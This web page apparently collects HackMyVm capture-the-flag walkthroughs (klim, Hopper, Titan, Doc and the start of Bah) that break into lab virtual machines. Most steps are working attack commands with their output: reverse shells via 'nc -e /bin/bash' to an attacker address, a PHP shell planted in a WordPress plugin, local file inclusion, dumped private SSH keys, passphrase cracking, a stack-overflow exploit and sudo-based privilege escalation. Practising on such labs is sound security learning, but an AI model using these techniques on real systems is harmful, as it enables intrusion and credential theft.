 ~ python3 -c "import urllib.parse;print(urllib.parse.unquote('ss7WhrrnnHOZC%239bQn'))"
 ss7WhrrnnHOZC#9bQn
</code></pre>
<p>Login wordpress, in Plugin Editor, modify one php file and add your php shell code into source.</p>
<p>Then get reverse shell.</p>
<pre><code class="language-bash"> ~ curl http://192.168.56.100/wordpress/wp-content/plugins/akismet/akismet.php
 ────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:57032.
 Linux klim 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
  04:51:34 up 29 min,  0 users,  load average: 0.00, 0.00, 0.00
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)</code></pre>
<p>Check sudo -l of www-data.</p>
<pre><code class="language-bash"> www-data@klim:/home/klim$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on klim:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on klim:
     (klim) NOPASSWD: /home/klim/tool</code></pre>
<p>Decompile tool, read the source code. It actually does "cat argv[1]".</p>
<p>```c
int __cdecl main(int argc, const char <strong>argv, const char </strong>envp)
{
size_t v3; // rbx
size_t v4; // rax
char s[5]; // [rsp+1Bh] [rbp-25h] BYREF
char *dest; // [rsp+20h] [rbp-20h]
size_t size; // [rsp+28h] [rbp-18h]</p>
<p>strcpy(s, "cat ");
v3 = strlen(s);
size = v3 + strlen(argv[1]) + 1;
dest = (char *)malloc(size);
strncpy(dest, s, size);
v4 = strlen(s);
strncat(dest, argv[1], size - v4);
system(dest);
return 0;
}</p>
<pre><code>
Get ssh key of user klim.

```bash
 www-data@klim:/home/klim$ sudo -u klim ./tool .ssh/id_rsa
 sudo -u klim ./tool .ssh/id_rsa
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
 NhAAAAAwEAAQAAAQEA0IBOKXuvWzdN/rTJXWZ7b1FadoLr5jQZ+LkaEJDWaUnYFlCpNd4e
 ...
 jwq/pz/4h+tzLkK+HocyYZFSZ+3Q3Rv4CK7HeWC80rfLNsc3ZktG755/WQLlXCSJ50sUmp
 Fp3Lkp1BGomrgELk4qqf3aF291nYcnSZVu0AfvlRWHHa52o23nuhu/rdcTQX5Lh4kWhWyz
 49he3VMR4O2JnBj2dwAAAAlrbGltQGtsaW0=
 -----END OPENSSH PRIVATE KEY-----
 www-data@klim:/home/klim$

Login ssh as klim.

~ ssh klim@192.168.56.100 -i id_rsa
 Linux klim 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Sun Jul 25 12:19:50 2021 from 192.168.0.28
 /usr/bin/xauth:  file /home/klim/.Xauthority does not exist
 klim@klim:~$ id
 uid=1000(klim) gid=1000(klim) groupes=1000(klim),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Found id_rsa.pub in /opt, following author's hint, use openssl

```bash
~ searchsploit openssl ...
OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH | linux/remote/5720.py
...


Following the steps in poc.

  ```bash
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
  tar -jxvf 5622.tar.bz2
  python 5720.py rsa/2048 192.168.56.100 root 22
  Tested 9979 keys | Remaining 22789 keys | Aprox. Speed 25/sec

 Key Found in file: 54701a3b124be15d4c8d3cf2da8f0139-2005
 Execute: ssh -lroot -p22 -i rsa/2048/54701a3b124be15d4c8d3cf2da8f0139-2005 192.168.56.100

 Tested 10001 keys | Remaining 22767 keys | Aprox. Speed 4/sec

Get root login.

```bash
~ ssh root@192.168.56.100 -i 54701a3b124be15d4c8d3cf2da8f0139-2005
...
root@klim:~# id;hostname
uid=0(root) gid=0(root) groupes=0(root)
klim

HackMyVm Hopper Walkthrough

发表评论

HackMyVm Hopper Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Hopper

Scan ports.

~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log                  
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-30 11:29 CST
 Nmap scan report for bogon (192.168.56.100)
 Host is up (0.00079s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 fc:84:7e:5d:15:85:4d:01:d3:7b:5a:00:de:a4:73:37 (RSA)
 |   256 54:f5:ea:db:a0:38:e2:c8:5a:db:30:91:3e:78:b4:b9 (ECDSA)
 |_  256 97:b6:b8:f7:cb:15:f5:6b:cd:92:5f:66:26:28:47:07 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enum port 80.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.z[500/1872]
403,404,500 --wildcard -o 80.log

/index.html (Status: 200) [Size: 80]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.100/javascript/]
/advanced-search (Status: 301) [Size: 326] [--> http://192.168.56.100/advanced-search/]


Check /advanced-search, input anything and click "Submit", notice the url became "http://192.168.56.100/advanced-search/path.php?path=xxx". Fuzz if there is LFI.

 ```bash
~ wfuzz -u 'http://192.168.56.100/advanced-search/path.php?path=file://FUZZ' --hh 0  -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.
 txt                                                                                                    
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000000005:   200        227 L    1115 W     7224 Ch     "/etc/apache2/apache2.conf"
 000000001:   200        27 L     39 W       1439 Ch     "/etc/passwd"
 000000018:   200        12 L     88 W       664 Ch      "/etc/fstab"                                    
 ...
 000000188:   200        0 L      1 W        32064 Ch    "/var/log/faillog"
 000000224:   200        1 L      4 W        1151 Ch     "/var/run/utmp"
 000000220:   200        34 L     237 W      164321 Ch   "/var/log/wtmp"
 000000199:   200        0 L      1 W        292584 Ch   "/var/log/lastlog"

Get username through passwd.

```bash
~ curl 'http://192.168.56.100/advanced-search/path.php?path=file:///etc/passwd';
root:x:0:0:root:/root:/bin/bash
...
edward:x:1000:1000:edward,,,:/home/edward:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
henry:x:1001:1001::/home/henry:/bin/bash


Make a python script to enum local port.

 ```python
#!/usr/bin/python3
 import requests

 for port in range(1,65535):
     res = requests.get(f'http://192.168.56.100/advanced-search/path.php?path=http://127.0.0.1:{port}')
     if len(res.text) == 0:
         continue
     else:
         print(f'port {port} is open.')

Port 2222 is open.

```bash
~ python3 enum.py
port 22 is open.
port 80 is open.
port 2222 is open.


Check port 2222.

 ```bash
~ curl 'http://192.168.56.100/advanced-search/path.php?path=http%3A%2F%2F127.0.0.1%3A2222'    
 <!DOCTYPE html>
 <html>
 <body>

 <h1>[+] WARNING</h1>

 <p> - Private corporative web server</p>

 <p> - If you are non organization personal, leave immediately</p>

 </body>
 </html>

Fuzz dirs of port 2222.

```bash
~ gobuster dir -u 'http://192.168.56.100/advanced-search/path.php?path=http%3A%2F%2F127.0.0.1%3A2222'; -t 50 -w /usr/share/dirbuster/wordlists/directory-lis
t-2.3-medium.txt -b 401,403,404,500 --wildcard --exclude-length 181

/backup (Status: 200) [Size: 1751]
...


Get a id_rsa key at /backup. Chmod 600. Burteforce the key of id_rsa.

 ```bash
~ /usr/share/john/ssh2john.py id_rsa  > hash.txt  
 & kali @ mykali in ~/Documents/hopper 0 [13:03:29]
 ~ john --wordlist=/usr/share/wordlists/rock_ascii.txt  hash.txt                                         ...
 barcelona        (id_rsa)

Login ssh with user name edward.

 ~ ssh edward@192.168.56.100 -i id_rsa
 Enter passphrase for key 'id_rsa':
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 /usr/bin/xauth:  file /home/edward/.Xauthority does not exist
 edward@hopper:~$ id
 uid=1000(edward) gid=1000(edward) grupos=1000(edward),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Upload a reverse shell php and get shell as www-data.

 ~ curl http://192.168.56.100/r.php
 ────────────────────────────────────────────────────────────────────────────────────────────────────────

 & kali @ mykali in ~/Documents/hopper 0 [13:07:35]
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:35698.
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
  07:07:50 up  1:41,  0 users,  load average: 0.01, 0.02, 0.02
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: 0: can't access tty; job control turned off
 $ id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

Check sudo -l.

```bash
www-data@hopper:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on hopper:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on hopper:
(henry) NOPASSWD: /usr/bin/watch


Set the term environment variable, and escalate to user henry.

```bash
 www-data@hopper:/$ export TERM=xterm-256color
 export TERM=xterm-256color
 www-data@hopper:/$ sudo -u henry watch -x sh -c 'reset; exec sh 1>&0 2>&0'
 sudo -u henry watch -x sh -c 'reset; exec sh 1>&0 2>&0'
 $ id
 id
 uid=1001(henry) gid=1001(henry) groups=1001(henry)</code></pre>
<p>Upload id_rsa.pub to /home/henry/.ssh/, change name to authorized_keys, and get ssh login as user henry.</p>
<pre><code class="language-bash">~ ssh henry@192.168.56.100
 Enter passphrase for key '/home/kali/.ssh/id_rsa':
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 /usr/bin/xauth:  file /home/henry/.Xauthority does not exist
 henry@hopper:~$ id
 uid=1001(henry) gid=1001(henry) grupos=1001(henry)</code></pre>
<p>Check sudo -l.</p>
<pre><code class="language-bash"> henry@hopper:~$ sudo -l
 Matching Defaults entries for henry on hopper:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User henry may run the following commands on hopper:
     (root) NOPASSWD: /usr/bin/ascii-xfr</code></pre>
<p>Use ascii-xfr to create a authorzied_keys of root.</p>
<p>```bash
henry@hopper:~$ sudo ascii-xfr -rv /root/.ssh/authorized_keys < .ssh/authorized_keys
ASCII download of "/root/.ssh/authorized_keys"</p>
<p>0.6 Kbytes transferred at 565 CPS... Done.</p>
<pre><code>
Login as root.

```bash
 ~ ssh root@192.168.56.100
 Enter passphrase for key '/home/kali/.ssh/id_rsa':
 Linux hopper 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
 /usr/bin/xauth:  file /root/.Xauthority does not exist
 root@hopper:~# id;hostname
 uid=0(root) gid=0(root) grupos=0(root)
 hopper

HackMyVm Titan Walkthrough

发表评论

HackMyVm Titan Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Titan

Scan ports first.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for chronos.local (192.168.56.100)
 Host is up (0.00098s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 37:fa:d2:9f:20:25:cf:c5:96:7a:dc:f3:ff:2c:7a:22 (RSA)
 |   256 11:ad:fa:95:71:c5:f9:d4:97:da:42:03:2b:0f:55:bb (ECDSA)
 |_  256 fa:fb:04:13:93:90:a5:01:53:ba:6c:e9:bf:dc:bf:7e (ED25519)
 80/tcp open  http    nginx 1.14.2
 |_http-server-header: nginx/1.14.2
 |_http-title: Site doesn't have a title (text/html).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80. found /robots.txt, then download athena.txt.

 ~ curl http://192.168.56.100/robots.txt
 gobuster-0 | 0 [14:29:34]
 /athena.txt

 ~ wget http://192.168.56.100/athena.txt

Use vim to open athena.txt, found some strange spaces and tabs.

image-20210829143154657.png

Through google "space tab steg", we know it's some crypto strings. And we can decrypt it with stegsnow. Then we get username and password of prometheus.

 ~ sudo apt install stegsnow
 stegsnow is already the newest version (20130616-6).
 ~ stegsnow -C athena.txt
 prometheus/iloveallhumans⏎

Log in ssh as prometheus, found a file named sacrifice in home folder.

 prometheus@titan:~$ ls -la
 total 52
 drwxr-xr-x 2 prometheus prometheus  4096 Aug 18 06:03 .
 drwxr-xr-x 5 root       root        4096 Aug  9 14:23 ..
 -rw------- 1 prometheus prometheus  2718 Aug 18 05:01 .bash_history
 -rw-r--r-- 1 prometheus prometheus   220 Aug  9 14:23 .bash_logout
 -rw-r--r-- 1 prometheus prometheus  3526 Aug  9 14:23 .bashrc
 -rw-r--r-- 1 prometheus prometheus   807 Aug  9 14:23 .profile
 -rwsr-sr-x 1 root       prometheus 16896 Aug  9 14:29 sacrifice
 -rw------- 1 prometheus prometheus   102 Aug 18 05:51 .Xauthority

Disassemble sacrifice, we can know, if we input "beef", we can escalate to user with uid 1000 (0x03E8).

 int __cdecl main(int argc, const char **argv, const char **envp)
 {
   char s1[72]; // [rsp+10h] [rbp-50h] BYREF
   int v6; // [rsp+5Ch] [rbp-4h]

   v6 = 1000;
   printf("What is your offer to the gods?");
   gets(s1);
   if ( strcmp(s1, "beef") )
   {
     printf("Thanks, mortal.");
   }
   else
   {
     setuid(0x3E8u);
     setgid(0x3E8u);
     printf("Take this gift.");
     system("/bin/bash");
   }
   return 0;
 }

Now we can escalate to user zeus.

 prometheus@titan:~$ ./sacrifice
 What is your offer to the gods?beef
 zeus@titan:~$ id
 uid=1000(zeus) gid=1001(prometheus) groups=1001(prometheus)

Check sudo -l.

zeus@titan:~$ sudo -l
 Matching Defaults entries for zeus on titan:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User zeus may run the following commands on titan:
     (hesiod) NOPASSWD: /usr/bin/ptx

Check help manual of ptx, then we can use ptx to read /home/hesiod/.ssh/id_rsa.

```bash
zeus@titan:/home/zeus$ sudo -u hesiod ptx /home/hesiod/.ssh/id_rsa -A -G
.xx "PRIVATE/" "" "-----BEGIN OPENSSH" "" "/home/hesiod/.ssh/id_rsa:1"
.xx "PRIVATE/" "" "-----END OPENSSH" "" "/home/hesiod/.ssh/id_rsa:27"
.xx "" "" "/JT+LbNag1ZqqNu02YET846I1xppdx/gYK5/hW19Shrw0F+V+G2U0AaVxfgFb+B2Sz+QER" "" "/home/hesiod/.ssh/id_rsa:16"
...
.xx "" "" "xUBZ868cu5Flrby84V8UpiXE+tPyq5bZUw24nlJTURFzqy0LkAcAtKQVihXaaoAlOJvz7z" "" "/home/hesiod/.ssh/id_rsa:22"
.xx "" "" "xqQSsiROLKN/zVEXAAAADGhlc2lvZEB0aXRhbgECAwQFBg==" "" "/home/hesiod/.ssh/id_rsa:26"


Paste line by line in order into a new key file, chmod 600, then we can login as hesiod with private key.

```bash
 ~ ssh hesiod@192.168.56.100 -i id_rsa                                                                   ...
 Last login: Wed Aug 18 05:51:27 2021 from 192.168.56.150
 hesiod@titan:~$ id
 uid=1002(hesiod) gid=1002(hesiod) groups=1002(hesiod)
 hesiod@titan:~$</code></pre>
<p>In /home/hesiod, we found a file named fire. It's writable.</p>
<pre><code class="language-bash">hesiod@titan:~$ ls -la
 total 56
 drwxr-xr-x 4 hesiod hesiod  4096 Aug 18 02:11 .
 drwxr-xr-x 5 root   root    4096 Aug  9 14:23 ..
 -rw------- 1 hesiod hesiod  1265 Aug 18 01:51 .bash_history
 -rw-r--r-- 1 hesiod hesiod   220 Aug  9 14:23 .bash_logout
 -rw-r--r-- 1 hesiod hesiod  3526 Aug  9 14:23 .bashrc
 -rwxr-x--- 1 hesiod hesiod 16608 Aug  9 14:27 fire
 drwxr-xr-x 3 hesiod hesiod  4096 Aug  9 14:25 .local
 -rw-r--r-- 1 hesiod hesiod   807 Aug  9 14:23 .profile
 drwx------ 2 hesiod hesiod  4096 Aug  9 14:31 .ssh
 -rw------- 1 hesiod hesiod   102 Aug 18 02:11 .Xauthority</code></pre>
<p>Now here is the key point to root.</p>
<p>Go back to sacrifice, in disassembler, just scroll up a little, we can found a secret function named "thief".</p>
<p>```bash
.text:0000000000001185                 public thief
.text:0000000000001185 thief           proc near
.text:0000000000001185 ; <strong>unwind {
.text:0000000000001185                 push    rbp
.text:0000000000001186                 mov     rbp, rsp
.text:0000000000001189                 mov     edi, 0          ; uid
.text:000000000000118E                 call    _setuid
.text:0000000000001193                 mov     edi, 0          ; gid
.text:0000000000001198                 call    _setgid
.text:000000000000119D                 lea     rdi, command    ; "/home/hesiod/fire"
.text:00000000000011A4                 call    _system
.text:00000000000011A9                 nop
.text:00000000000011AA                 pop     rbp
.text:00000000000011AB                 retn
.text:00000000000011AB ; } // starts at 1185
.text:00000000000011AB thief           endp
.text:00000000000011AB
.text:00000000000011AC
.text:00000000000011AC ; =============== S U B R O U T I N E =======================================
.text:00000000000011AC
.text:00000000000011AC ; Attributes: bp-based frame
.text:00000000000011AC
.text:00000000000011AC ; int __cdecl main(int argc, const char <strong>argv, const char </strong>envp)
.text:00000000000011AC                 public main
.text:00000000000011AC main            proc near               ; DATA XREF: _start+1D↑o
.text:00000000000011AC
.text:00000000000011AC var_60          = qword ptr -60h
.text:00000000000011AC var_54          = dword ptr -54h
.text:00000000000011AC s1              = byte ptr -50h
.text:00000000000011AC var_8           = dword ptr -8
.text:00000000000011AC var_4           = dword ptr -4
.text:00000000000011AC
.text:00000000000011AC ; </strong>unwind {
.text:00000000000011AC                 push    rbp
.text:00000000000011AD                 mov     rbp, rsp
.text:00000000000011B0                 sub     rsp, 60h
.text:00000000000011B4                 mov     [rbp+var_54], edi
.text:00000000000011B7                 mov     [rbp+var_60], rsi</p>
<pre><code>
Through reading the source code, we get the final method:

We need to overflow sacrifice, then run secret function "thief", "thief" then calls /home/hesiod/fire, and write shellcode in fire to get root.

To successfully pwn sacrifice, first step is to calcute the offset of overflow point. Download sacrificeto local machine, and use gdb-peda to load it. 

Create pattern string with length 200.

```bash
 gdb-peda$ pattern create 200
 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'

Input 'r' to let program run, when ask for input answer, paste the above pattern string.

 gdb-peda$ r
 Starting program: /home/kali/Documents/titan/sacrifice
 What is your offer to the gods?AAA%AAsA...

Then we will get Segmentation fault, because return address is illegal.

Program received signal SIGSEGV, Segmentation fault.
 [----------------------------------registers-----------------------------------]
 ...
 RSP: 0x7fffffffe4e8 ("AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
 RIP: 0x55555555524a (<main+158>:        ret)
 ...
 EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
 [-------------------------------------code-------------------------------------]
    0x55555555523f <main+147>:   call   0x555555555040 <printf@plt>
    0x555555555244 <main+152>:   mov    eax,0x0
    0x555555555249 <main+157>:   leave  
 => 0x55555555524a <main+158>:   ret    
    0x55555555524b:      nop    DWORD PTR [rax+rax*1+0x0]
    0x555555555250 <__libc_csu_init>:    push   r15
    0x555555555252 <__libc_csu_init+2>:  mov    r15,rdx
    0x555555555255 <__libc_csu_init+5>:  push   r14
 [------------------------------------stack-------------------------------------]
 0000| 0x7fffffffe4e8 ("AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
 0008| 0x7fffffffe4f0 ("6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
 ...
 [------------------------------------------------------------------------------]
 Legend: code, data, rodata, value
 Stopped reason: SIGSEGV
 0x000055555555524a in main ()

Use "patter search" to get the offset is 88 for [RSP]. And [RSP] points to the original return address, which we want to overflow with our own return address.

 gdb-peda$ pattern search
 Registers contain pattern buffer:
 RBP+0 found at offset: 80
 Registers point to pattern buffer:
 [RSP] --> offset 88 - size ~112
 [R8] --> offset 0 - size ~212
 ...

The method is, we need to fill 87 chars, then following the address of secret function "thief", which is 0x555555555185. (Maybe not the same on your machine).

```bash
gdb-peda$ disassemble 0x555555555185
Dump of assembler code for function thief:
0x0000555555555185 <+0>: push rbp
0x0000555555555186 <+1>: mov rbp,rsp
0x0000555555555189 <+4>: mov edi,0x0
0x000055555555518e <+9>: call 0x555555555080 <setuid@plt>
0x0000555555555193 <+14>: mov edi,0x0
0x0000555555555198 <+19>: call 0x555555555070 <setgid@plt>
0x000055555555519d <+24>: lea rdi,[rip+0xe64] # 0x555555556008
0x00005555555551a4 <+31>: call 0x555555555030 <system@plt>
0x00005555555551a9 <+36>: nop
0x00005555555551aa <+37>: pop rbp
0x00005555555551ab <+38>: ret
End of assembler dump.


Because intel machine is little-Endian, so the 64bit address of 0x555555555185 should be <code>"\x85\x51\x55\x55\x55\x55\x00\x00" in python string format.

We write reverse shell code in /home/hesiod/fire as user hesiod, remember to add +x in order to let prometheus has execute permission.

```bash
 hesiod@titan:~$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > fire
 hesiod@titan:~$ chmod +x fire
 hesiod@titan:~$ ls -la fire
 -rwxr-x--x 1 hesiod hesiod 36 Aug 18 06:05 fire

Then back to user prometheus, use python to generate the evil string and pwn sacrifice.

 prometheus@titan:~$ python3 -c 'print("a"*87+"\x85\x51\x55\x55\x55\x55\x00\x00")' |./sacrifice
 ────────────────────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234  
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:47256.
 id
 uid=0(root) gid=0(root) groups=0(root),1001(prometheus)
 cd /root
 id;hostname
 uid=0(root) gid=0(root) groups=0(root),1001(prometheus)
 titan

HackMyVm Doc Walkthrough

发表评论

HackMyVm Doc Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Doc

Scan ports, only port 80 is open.

nmap -sV -sC -p- -oN ports.log 192.168.56.100
 Nmap scan report for bah.hmv (192.168.56.100)
 Host is up (0.00070s latency).
 Not shown: 65534 closed ports
 PORT   STATE SERVICE VERSION
 80/tcp open  http    nginx 1.18.0
 | http-cookie-flags:
 |   /:
 |     PHPSESSID:
 |_      httponly flag not set
 |_http-server-header: nginx/1.18.0
 |_http-title: Online Traffic Offense Management System - PHP

Check port 80, it's Online Traffic Offense Management System. Google the exploit, and add doc.hmv to /etc/hosts.

https://www.exploit-db.com/exploits/50221

Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)

Use the POC to get user shell.

```bash
~ (p2) python 50221.py
Example: http://example.com
Url: http://doc.hmv
Check Url ...
[+] Bypass Login
[+] Upload Shell
[+] Exploit Done!
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


Because this shell is not full functional, we spawn another reverse shell.

```bash
 $ nc 192.168.56.150 1234 -e /bin/bash
 ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────
 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:44802.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 python3 -c 'import pty;pty.spawn("/bin/bash")'

Found the password for user bella.

www-data@doc:~/html/traffic_offense$ cat initialize.php
 cat initialize.php
 <?php
 $dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>'');
 if(!defined('base_url')) define('base_url','http://doc.hmv/');
 if(!defined('base_app')) define('base_app', str_replace('\\','/',__DIR__).'/' );
 if(!defined('dev_data')) define('dev_data',$dev_data);
 if(!defined('DB_SERVER')) define('DB_SERVER',"localhost");
 if(!defined('DB_USERNAME')) define('DB_USERNAME',"bella");
 if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"be114yTU");
 if(!defined('DB_NAME')) define('DB_NAME',"doc");
 ?>

Escalate to user bella.

```bash
www-data@doc:~/html/traffic_offense$ su bella
su bella
Password: be114yTU

bella@doc:/var/www/html/traffic_offense$ id
id
uid=1000(bella) gid=1000(bella) groups=1000(bella),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
bella@doc:/var/www/html/traffic_offense$


Check local port, port 21 is actually ssh, so we portforword it outside.

 ```bash
bella@doc:/$ ss -ntlp
 ss -ntlp
 State  Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
 LISTEN 0      80         127.0.0.1:3306      0.0.0.0:*          
 LISTEN 0      511          0.0.0.0:80        0.0.0.0:*          
 LISTEN 0      128        127.0.0.1:21        0.0.0.0:*          
 LISTEN 0      511             [::]:80           [::]:*          
 bella@doc:/$ socat TCP-LISTEN:5000,fork,reuseaddr tcp:127.0.0.1:21 &
 socat TCP-LISTEN:5000,fork,reuseaddr tcp:127.0.0.1:21 &
 [1] 571

Check sudo -l.

```bash
bella@doc:~$ sudo -l
Matching Defaults entries for bella on doc:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bella may run the following commands on doc:
(ALL : ALL) NOPASSWD: /usr/bin/doc


Disassemble doc, we know it's actually pydoc3.9.

 ```bash
; Attributes: bp-based frame
 ; int __cdecl main(int argc, const char **argv, const char **envp)
 public main
 main proc near
 ; __unwind {
 push    rbp
 mov     rbp, rsp
 lea     rdi, command    ; "/usr/bin/pydoc3.9 -p 7890"
 call    _system
 nop
 pop     rbp
 retn
 ; } // starts at 1135
 main endp

Google exploit of pydoc.

https://bugs.python.org/issue42988

Start doc server.

 bella@doc:/$ sudo doc
 sudo doc
 Server ready at http://localhost:7890/
 Server commands: [b]rowser, [q]uit
 server>

In another term, we login ssh as user bella, and get the ssh key of root.

 ~ ssh bella@192.168.56.100 -p 5000      
 bella@192.168.56.100's password:
 ...
 Last login: Thu Aug 26 21:33:08 2021 from 127.0.0.1
 bella@doc:~$ curl http://localhost:7890/getfile?key=/root/.ssh/id_rsa
 ...
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
 NhAAAAAwEAAQAAAYEA6EoSPtXiFtzobkdXCemyu+inUAHe1+tAWvDEEpUSOYXVTDZXUhsA
 qJ0B8PP+/i2gJb4ROUpuDJ6e8Ca1UYJdKFX47f5g0BRM+S5ZLueQDjv66Di7MukuKaLzq7
 LapI7QvuPNStnZsolvixn0urFfKBQWJ2x3DGXcZCUWx37G7Ip8FawmF7OAkD5+R+0PucRz
 ...
 s1R6k834FA4RfIpakszn95GJQKVbuJrK/rbl3FVMJ/Q2RiiXPkEmfhoYJFSpp+8I9cJQkz
 uQ1x5zlzTqI5n3AAAACHJvb3RAZG9jAQI=
 -----END OPENSSH PRIVATE KEY-----

Login ssh as root.

 ~ ssh root@192.168.56.100 -p 5000 -i key
 root@doc:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 doc
 root@doc:~#

HackMyVm Bah Walkthrough

发表评论

HackMyVm Bah Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Bah

Scan ports.

 ~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log  
 ...
 PORT     STATE SERVICE VERSION
 80/tcp   open  http    nginx 1.18.0
 |_http-server-header: nginx/1.18.0
 |_http-title: qdPM | Login
 3306/tcp open  mysql   MySQL 5.5.5-10.5.11-MariaDB-1
